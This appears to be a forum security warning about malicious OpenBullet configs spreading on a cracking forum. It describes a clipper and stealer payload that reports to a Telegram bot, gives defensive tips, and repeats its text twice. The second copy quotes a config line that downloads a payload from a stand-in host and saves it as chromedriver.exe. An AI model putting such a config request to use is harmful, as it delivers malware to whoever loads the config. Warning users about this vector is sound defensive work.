2 months ago
We have noticed an increased volume of malicious OpenBullet configs lately.
Like many other malware-related incidents, the attacker uses compromised accounts to spread and to reply to their threads.
Unlike other malware, a malicious config won't have any detection on VirusTotal because there is no code being executed; it's text.
In other words, VirusTotal isn't aware that your config will be loaded on OpenBullet, and it will be translated to a set of instructions.
The malware attack vector is a malicious GET request, and it looks like this:
The GET request leads to the payload "API" being downloaded with no extension, in the folder "bin" and then renamed to "chromedriver.exe".
So far, we have seen this malware change the victim clipboarded Bitcoin address (clipper) and read numerous files containing system information (stealer).
The malware logs the victim IP address and sends the stolen data to a Telegram bot. Persistence is granted through a task on the Windows Task Scheduler.
At any time, the malware may change depending on the attacker needs. Here are a few steps you can take to step up your security:
(1) Enable Two Factor Authentication. It will prevent your account from being accessed if your logins have been stolen.
(2) Do not access Cracked on a virtual machine, or a remote desktop, where you usually run potentially malicious files.
(3) Read your config with any text editor to check for any malicious requests, like malware (GET requests) or hitloggers (POST requests).
Last but not least, report malicious configs.
Like many other malware-related incidents, the attacker uses compromised accounts to spread and to reply to their threads.
Unlike other malware, a malicious config won't have any detection on VirusTotal because there is no code being executed; it's text.
In other words, VirusTotal isn't aware that your config will be loaded on OpenBullet, and it will be translated to a set of instructions.
The malware attack vector is a malicious GET request, and it looks like this:
Quote:REQUEST GET "https://site.com/config/API"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
-> FILE "bin/chromedriver.exe"
The GET request leads to the payload "API" being downloaded with no extension, in the folder "bin" and then renamed to "chromedriver.exe".
So far, we have seen this malware change the victim clipboarded Bitcoin address (clipper) and read numerous files containing system information (stealer).
The malware logs the victim IP address and sends the stolen data to a Telegram bot. Persistence is granted through a task on the Windows Task Scheduler.
At any time, the malware may change depending on the attacker needs. Here are a few steps you can take to step up your security:
(1) Enable Two Factor Authentication. It will prevent your account from being accessed if your logins have been stolen.
(2) Do not access Cracked on a virtual machine, or a remote desktop, where you usually run potentially malicious files.
(3) Read your config with any text editor to check for any malicious requests, like malware (GET requests) or hitloggers (POST requests).
Last but not least, report malicious configs.